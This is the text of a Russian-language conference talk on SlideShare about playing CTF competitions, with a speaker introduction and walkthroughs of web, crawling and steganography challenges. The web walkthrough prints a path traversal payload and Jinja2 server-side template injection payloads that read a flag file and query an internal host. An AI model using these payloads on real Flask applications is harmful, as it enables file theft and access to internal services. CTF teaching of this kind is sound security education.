SlideShare a Scribd company logo
Играем в CTF
- познаем мир
информационной безопасности
Кто я такой?
• Участник CTF команды b1n4ry4rms
и один из основателей команды hackerstan (об этой команде
ниже)
• Играю в CTF c августа 2016 года
• Работаю в Mad Devs, занимаюсь вебом.
• Больше 10 лет опыта в программировании
• Интересуюсь ИБ
В каких CTF поучаствовал?
Лаборатории, в которых участвовал:
V8 , V9, V10
lab.pentestit.r
u
Что такое CTF?
• Скорость
• Навыки и знания
• Командная работа
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Ну и главная цель CTF :)
Результаты личного CTF hackyou.ctf.su
• 1400 очков 62 место из 374 участников и я
единственный из Кыргызстана :) участвовал
Достижения hackerstan 540 pts 406 место
hackerstan
А ты готов вступить в
ряды нашей команды?
https://goo.gl/SvZvqG
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Виды CTF
• Jeopardy
• Командные
• Личные
• Attack-defence
• Командные
Погрузимся в мир CTF
Zumbo 3 (WEB)
Bsidessf CTF
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
<!-- page: index.template,
src: /code/server.py -->
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'
with open('/flag') as f:
flag2 = f.read()
flag3 =
requests.get('http://vault:8080/flag').text
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
/..%2f../flag
template += "n<!-- page: %s, src: %s -->n" % (page, __file__)
return flask.render_template_string( template, name='test',
counter=counter);
SSTI - Server Side Template Injection ?
Как проверить?
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[40]}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}
{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[341]}}
{% with b=''.__class__.__mro__[2].
__subclasses__()[341]('vault:8080') %}
{{b.request('GET', '/flag')}}
{{b.getresponse().read()}}{% endwith %}
hackyou.ctf.su
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
root@kali:~/# echo -e
"ZDc3MTEyMDJmYmFiOGE2ZTc1YjY5ZmZmOGZiOWQ3OTM=" | base64
-d; echo ''
d7711202fbab8a6e75b69fff8fb9d793
root@kali:~/#
root@windows:~/ScrapyProjects# scrapy startproject hackyouctf
New Scrapy project 'hackyouctf', using template directory
'/usr/local/lib/python2.7/dist-packages/scrapy/templates/project', created in:
/root/ScrapyProjects/hackyouctf
You can start your first spider with:
cd hackyouctf
scrapy genspider example example.com
root@windows:~/ScrapyProjects/hackyouctf#
scrapy genspider ppc100 hackyou-captcha.ctf.su
Created spider 'ppc100' using template 'basic' in module:
Hackyouctf.spiders.ppc100
root@windows:~/ScrapyProjects/hackyouctf#
cd hackyouctf/spiders/
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
ls
__init__.py __init__.pyc ppc100.py
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
<code> ……... </code>
Scrapy Spider
root@windows:~/ScrapyProjects/hackyouctf#
scrapy crawl ppc100
Flag: <b>Kill_4ll_hum4ns_like_in_f1rst_hack_y0u_h2LExNo</b>
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
strings steg200_a086e0c.jpeg
JFIF
http://futureboy.us/
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
^Gko
NS?7W
@=Fx
5<in
wATu$db
3OM
Присутствует раздел стенографии
Выбор декодирования картинки
Загружаем картинку
http://futureboy.us/stegano/decode.pl
Вс3м сп4с160!

More Related Content

PDF
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
PDF
DEFCON и развитие информационной безопасности в стране
PDF
Жив ли CTF
PDF
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
PPT
2012 i pt-devteev-phdays-ctf_2011_mifi
PPT
РусКрипто CTF 2010 Full Disclosure (мастер класс)
PDF
Добро пожаловать в практическую безопасность (Сергей Белов)
PDF
Добро пожаловать в практическую безопасность (Сергей Белов)
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
DEFCON и развитие информационной безопасности в стране
Жив ли CTF
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
2012 i pt-devteev-phdays-ctf_2011_mifi
РусКрипто CTF 2010 Full Disclosure (мастер класс)
Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)

Similar to Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности (6)

PDF
Сколько надо SOC?
PPTX
[DagCTF 2015] Hacking motivation
PDF
играем в Ctf познаем мир информационной безопасности
PPTX
SECON'2014 - Команда CTRL-PNZ - Уязвимости для самых маленьких. Что это, как ...
PDF
Машинное обучение в кибербезопасности
Сколько надо SOC?
[DagCTF 2015] Hacking motivation
играем в Ctf познаем мир информационной безопасности
SECON'2014 - Команда CTRL-PNZ - Уязвимости для самых маленьких. Что это, как ...
Машинное обучение в кибербезопасности
Ad

More from Mad Devs (20)

PPTX
Держите одеяло у себя: как общаться с кандидатом и узнавать все, что вам инте...
PPTX
Дружелюбнй онбординг: как с увеличением количества не потерять качество
PPTX
Mad Stream: Software Architecture 101.
PPTX
Mad Stream: Соло-прокачка мобильного разработчика. Спикер - Айбек Ногоев.
PDF
Mad Stream - 7 habits of highly awesome developers. Speaker - Anatoliy Fedorenko
PDF
Mad Stream: "Что можно напечатать на 3d принтере, помимо еще одного 3d принте...
PDF
Maв Stream: "Факт карты на службек у ПМа", спикер – Дмитрий Кононенко
PDF
Лайфхаки менеджмента на удаленке от Дмитрия Кононенко
PDF
Mad Talks. Astashov_splitbrain
PPTX
Flutter vs Native App Development
PDF
Mad Talks. Marketing tips for tech companies
PDF
The paradox of choice in design
PDF
Git and Github for Beginners
PDF
How to hire freelancers
PDF
Ethereum blockchain
PDF
"Outside In". Web application testing.
PDF
Asynchrony in python exists and why should you use it
PDF
Ethereum: аспекты разработки смарт-контрактов
PDF
Why we sleep. Michael Ivashenko
PDF
Удаленное управление приложением и его аналитика
Держите одеяло у себя: как общаться с кандидатом и узнавать все, что вам инте...
Дружелюбнй онбординг: как с увеличением количества не потерять качество
Mad Stream: Software Architecture 101.
Mad Stream: Соло-прокачка мобильного разработчика. Спикер - Айбек Ногоев.
Mad Stream - 7 habits of highly awesome developers. Speaker - Anatoliy Fedorenko
Mad Stream: "Что можно напечатать на 3d принтере, помимо еще одного 3d принте...
Maв Stream: "Факт карты на службек у ПМа", спикер – Дмитрий Кононенко
Лайфхаки менеджмента на удаленке от Дмитрия Кононенко
Mad Talks. Astashov_splitbrain
Flutter vs Native App Development
Mad Talks. Marketing tips for tech companies
The paradox of choice in design
Git and Github for Beginners
How to hire freelancers
Ethereum blockchain
"Outside In". Web application testing.
Asynchrony in python exists and why should you use it
Ethereum: аспекты разработки смарт-контрактов
Why we sleep. Michael Ivashenko
Удаленное управление приложением и его аналитика
Ad

Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности